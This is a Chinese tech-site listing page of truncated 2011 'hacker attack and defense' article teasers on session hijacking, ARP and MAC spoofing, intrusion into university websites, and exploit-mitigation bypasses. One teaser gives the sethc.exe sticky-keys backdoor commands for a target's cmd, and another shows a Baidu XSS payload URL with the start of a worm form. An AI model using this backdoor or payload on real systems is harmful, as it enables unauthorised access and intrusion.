技术文献_电脑技术_技术知识_知识大全-知识屋www.zhishiwu.com

黑客攻防之PPPoE验证及利用 2011-06-26 04:25:18
一、前言近年来，网络数据业务发展迅速，宽带用户呈爆炸式的增长，运营商在采用xDSL，LAN，HFC，无线等多种接入方式的同时，为了构建一个可运营、可管理、可盈利的宽带网络，十分关心如何有效地完成用户的管理，PPPoE（PPP over Ethernet）就是随之出现的
会话劫持攻击实战详解 2011-06-26 04:22:51
通常，大家所说的入侵，都是针对一台主机，在获得管理员权限后，就很是得意；其实，真正的入侵是占领整个内部网络。针对内部网络的攻击方法比较多，但比较有效的方法非ARP欺骗、DNS欺骗莫属了。但是，不管使用什么技术，无非都是抓取目标的数据包，然后分析
管理员的玩笑管理员权限上传漏洞解析 2011-06-26 04:21:57
管理员的玩笑浅谈入侵中的一些小问题 BY剑心[B.C.T] 这两天很无聊，趁着放假的时间就准备练习下自己的入侵技术，没有什么目标就准备测试下周围大学网站的安全性，顺便拿网站练练手。大部分这些网站的管理员应该说安全意识都不错的，毕竟都是大学的管理员
利用系统默认热键做后门 2011-06-26 04:20:51
在目标cmd执行如下命令： copyc:windowsexplorer.exec:windowssystem32sethc.exe copyc:windowssystem32sethc.exec:windowssystem32dllcachesethc.exe 那么连接目标终端，只需要连续敲击shift键5次，即可以进入桌面了。 copyc:windowsexplorer
s.exe在SP2下不能扫描的解决方案 2011-06-26 04:19:32
可以这样测试: 察看日志： 1、打开控制面板 2、点击性能和维护 3、点击管理工具 4、运行事件察看器 5、在事件察看器左边点击系统 6、在右边滚上滚下找有没有事件号是4226的如果你看到很多这个事件的话，说明SP2经常限制你的连接数限制连接数的原因可能是因
教菜鸟写注册机 2011-06-26 04:18:56
到一些黑客站点上转转，发现那些最受欢迎、点击次数最多的文章都是一些教菜鸟使用木马入侵初级教程之类文章，而Outlook Express HTML邮件超长字节href值缓冲溢出缺陷PHP fopen()函数易遭到CRLF Injection攻击这种文章却乏人问津，尽管这或许才是真正高手所
无ARP欺骗的嗅探技术 2011-06-26 04:08:06
ARP欺骗的攻击和防御技术都比较成熟了，这里也不再阐述。此次重点讲解如何不用ARP欺骗进行嗅探以及会话劫持的技术原理，实际的攻击方法是进行MAC欺骗。一、原理：在开始之前我们先简单了解一下交换机转发过程：交换机的一个端口收到一个数据帧时，首先检查
Bypassing Browser Memory Protections读后笔记 2011-06-26 04:07:08
Alexander Sotirov 和 Mark Dowd 这次在BlackHat的paper果然内容很丰富，链接就不加了， google一下应该就有。这次paper里没啥新的东西，基本上是关于绕过GS/SAFESEH/HEAP/DEP/ASLR等技巧的一些总结。不过文章非常具有系统性，很多细节的地方讲的都很清楚。
Java applet 安全性探究 2011-06-26 04:06:09
作者：空虚浪子心【XGC】【IT168专稿】引言因为一个0day，让作者对java applet心血来潮，随着不断的失败，发现了一个又一个安全特性。本文提醒大家，除了activeX，还有这么一种东西，一旦出现了安全隐患，也会帮大家做些什么。如果你要找0DAY，请掠过;如
百度暴xssworm 跨站漏洞 2011-06-26 04:04:55
http://www.baidu.com/index.php?bar= [/url]/**/style=xss:expression(alert(xss)); 有点死循环的性质,无限弹窗. div id=xssworm. form name=form1 id=popFormSubmit action= method=post input type=hidden name=ct value=1 input type=hidden name=cm val